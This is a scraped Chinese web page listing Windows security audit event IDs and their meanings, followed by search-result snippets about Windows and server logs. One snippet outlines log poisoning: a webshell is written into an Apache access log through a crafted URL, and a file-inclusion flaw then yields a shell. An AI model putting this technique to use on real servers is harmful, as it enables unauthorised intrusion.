      5031 - Windows防火墙服务阻止一个应用程序接收网络中的入站连接
      4698 -计划任务已创建
      4699 -计划任务已删除
      4700 -计划任务已启用
      4701 -计划任务已停用
      4702 -计划任务已更新
      4657 -注册表值被修改
      5039 -注册表项被虚拟化
      4660 -对象已删除
      4663 -试图访问一个对象
      审计政策变化
      4715 - 对象上的审计政策(SACL)已经更改
      4719 - 系统审计政策已经更改
      4902 - Per-user审核政策表已经创建
      4906 - CrashOnAuditFail值已经变化
      4907 - 对象的审计设置已经更改
      4706 - 创建到域的新信任
      4707 - 到域的信任已经删除
      4713 - Kerberos政策已更改
      4716 - 信任域信息已经修改
      4717 - 系统安全访问授予帐户
      4718 - 系统安全访问从帐户移除
      4864 - 名字空间碰撞被删除
      4865 - 信任森林信息条目已添加
      4866 - 信任森林信息条目已删除
      4867 - 信任森林信息条目已取消
      4704 - 用户权限已分配
      4705 - 用户权限已移除
      4714 - 加密数据复原政策已取消
      4944 - 当开启Windows Firewall时下列政策启用
      4945 - 当开启Windows Firewall时列入一个规则
      4946 - 对Windows防火墙例外列表进行了修改,添加规则
      4947 - 对Windows防火墙例外列表进行了修改,规则已修改
      4948 - 对Windows防火墙例外列表进行了修改,规则已删除
      4949 - Windows防火墙设置已恢复到默认值
      4950 - Windows防火墙设置已更改
      4951 - 因为主要版本号码不被Windows防火墙承认,规则已被忽视
      4952 - 因为主要版本号码不被Windows防火墙承认,部分规则已被忽视,将执行规则的其余部分
      4953 - 因为Windows防火墙不能解析规则,规则被忽略
      4954 - Windows防火墙组政策设置已经更改,将使用新设置
      4956 - Windows防火墙已经更改主动资料
      4957 - Windows防火墙不适用于以下规则
      4958 - 因为该规则涉及的条目没有被配置,Windows防火墙将不适用以下规则:
      6144 - 组策略对象中的安全政策已经成功运用
      6145 - 当处理组策略对象中的安全政策时发生一个或者多个错误
      4670 - 对象的权限已更改
      审计特权使用
      4672 - 给新登录分配特权
      4673 - 要求特权服务
      4674 - 试图对特权对象尝试操作
      审计系统事件
      5024 - Windows防火墙服务已成功启动
      5025 - Windows防火墙服务已经被停止
      5027 - Windows防火墙服务无法从本地存储检索安全政策,该服务将继续执行目前的政策
      5028 - Windows防火墙服务无法解析的新的安全政策,这项服务将继续执行目前的政策
      5029 - Windows防火墙服务无法初始化的驱动程序,这项服务将继续执行目前的政策
      5030 - Windows防火墙服务无法启动
      5032 - Windows防火墙无法通知用户它阻止了接收入站连接的应用程序
      5033 - Windows防火墙驱动程序已成功启动
      5034 - Windows防火墙驱动程序已经停止
      5035 - Windows防火墙驱动程序未能启动
      5037 - Windows防火墙驱动程序检测到关键运行错误,终止。
      4608 -Windows正在启动
      4609 - Windows正在关机
      4616 - 系统时间被改变
      4621 - 管理员从CrashOnAuditFail回收系统,非管理员的用户现在可以登录,有些审计活动可能没有被记录
      4697 - 系统中安装服务器
      4618 - 监测安全事件样式已经发生

    展开全文
  • 通过批处理查询当前3389端口筛选内容到文本,再通过任务计划通过事件触发马上执行,每台服务器都会产生一个ip独立的文件,代码包含登录和退出的登记,贼好用
  • WinTail是Windows的免费软件Tail工具,能够模拟LINUX / UNIX tail... 包括SMTP等功能,以及在某种grep功能监视下的文件中找到的特定关键字的声音通知。 该工具与客户端和服务器的所有32bit / 64bit Windows平台兼容。
  • 用于更多日志文件数据源的插件API 自动确定具有给定文件名和内容的列化程序(实验性) Serilog.Formatting.Compact格式支持(实验性) 下载 按照下载最新的软件包。 只需将其解压缩到所需位置并执行应用程序,或...
  • windows驱动写日志,可以获取进程的全路径(包含进程全名),有Zw系列函数的实现也有Flt系列函数的实现,用minifilter实现的
  • 关于Windows日志

    2021-02-09 10:39:19
    什么是 Windows日志? Windows网络操作系统都设计有各种各样的日志文件,如应用程序日志,安全日志、系统日志、Scheduler服务日志、FTP日志、WWW日志、DNS服务器日志等等,这些根据你的系统开启的服务的不同而有所...
  • windows服务器日志查看工具

    千次阅读 2021-08-08 07:39:27
    windows服务器日志查看工具 内容精选换一换本节操作指导用户查看...打开“ Windows日志 > 安全 > 筛选当前日志”。筛选事件ID为4776的事件即为远程登录日志。您还可以使用4624和4625查看登录信息。4624:Wind...
  • 文件包含日志getshell

    千次阅读 2022-01-13 23:44:18
    apache等中间件都会用一个日志文件用来记录一些信息,例如在某个时间段用户访问的url路劲和状态码,如果这个时候将访问的url改为一句话代码就会记录到日志中,在配合文件包含漏洞是可以直接getshell的,当然这个只在...
  • 闲聊Windows系统日志

    千次阅读 2021-03-18 08:29:14
    title: "闲聊Windows系统日志"date: 2021-02-22T18:59:49+08:00draft: truetags: ['windows']author: "dadigang"author_cn: "大地缸"personal: "http://www.real007.cn"闲聊Windows系统日志2018-07-302018-07-30 17:...
  • Python解析windows系统日志文件

    千次阅读 2019-06-19 19:28:25
    DOM是Document Object Model的简称,XML 文档的高级树型表示。该模型并非只针对 Python,而是一种普通XML 模型。Python 的 DOM 包是基于 SAX 构建的,...Python取证技术: Windows 事件日志分析 1.安装python_Evtx...
  • mysql日志文件

    千次阅读 2021-01-18 21:10:06
    日志文件类型MySQL有几个不同的日志文件,可以帮助你找出mysqld内部发生的事情:日志文件记入文件中的信息类型错误日志记录启动、运行或停止mysqld时出现的问题。查询日志记录建立的客户端连接和执行的语句。更新...
  • windows日志和审核

    万次阅读 2019-12-05 23:43:40
    windows事件日志简介 Windows事件日志记录着 Windows系统中发生...Windows事件日志文件本质上是数据库,其中包括有关系统、安全、应用程序的记录。记录的事件包含9个元素:日期/时间、事件级别、用户、计算机、事件1D...
  • Windows日志文件默认位置是“%systemroot%\system32\config安全日志文件:%systemroot%\system32\config \SecEvent.EVT系统日志文件:%systemroot%\system32\config \SysEvent.EVT应用程序日志文件:%systemroot%\...
  • windows 配置日志服务器

    千次阅读 2021-08-13 04:07:50
    windows 配置日志服务器 内容精选换一换在使用LTS时,您需注意以下使用限制。使用限制中部分内容属于配额,关于什么是配额以及怎样查看与修改配额,详见关于配额。LTS日志采集支持多个操作系统,在购买主机时您需...
  • 用户每打开一次网页,iis 都会记录用户IP、访问的网页地址、访问时间、访问状态等信息,这些信息保存在 iis日志文件里,方便网站管理员掌握网页被访问情况和 iis 服务器运行情况。如果网页被恶意访问(如注入数据库...
  • Windows日志特指Windows操作系统中各种各样的日志文件,如应用程序日志,安全日志、系统日志、Scheduler服务日志、FTP日志、WWW日志、DNS服务器日志等,这些根据你的系统开启的服务的不同而有所不同。我们在系统上...
  • Windows日志分析 一、Windows事件日志简介 1、Windows事件日志 Windows系统日志是记录系统中硬件、软件和系统问题的信息,同时还可以监视系统中发生的事件。用户可以通过它来检查错误发生的原因,或者寻找受到...
  • linux日志文件

    千次阅读 2021-05-09 07:50:27
    下面我给大家介绍一下linux里面的日志文件:日志一般的服务都包括:访问日志和错误指示;访问日志一般记录服务的运行状态,服务执行了什么操作,都记录在访问日志中;而错误日志通过名字也可理解,到服务遇到错误时...
  • windows服务器自动删除日志文件

    万次阅读 2018-02-08 10:23:49
    背景: 有一天发现一系统程序突然终止了,发出了系统异常邮件。然后就去服务器看原因,原因竟然是服务器硬盘被撑... 为了一劳永逸的解决硬盘空间问题,我们对服务器日志文件进行定时删除处理,只保留最近一个月的...
  • Windows 共享文件访问日志

    千次阅读 2017-11-16 17:12:00
    点击【事件查看器】---【Windows日志】---【安全】在右侧点击【筛选当前日志】 d.在弹出筛选日志窗口中,找到【包括/排除事件ID...】项输入:4663 ,确定 e.查看事件 本文转自wanglm...
  • windows服务器审计日志存放位置

    千次阅读 2021-08-08 01:05:47
    windows服务器审计日志存放位置 内容精选换一换备份控制函数可帮助进行在线备份。pg_create_restore_point(name text)描述:为执行恢复创建一个命名点。(需要管理员角色)返回值类型:text备注:pg_create_restore_...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 245,319
精华内容 98,127
关键字:

windows日志文件包括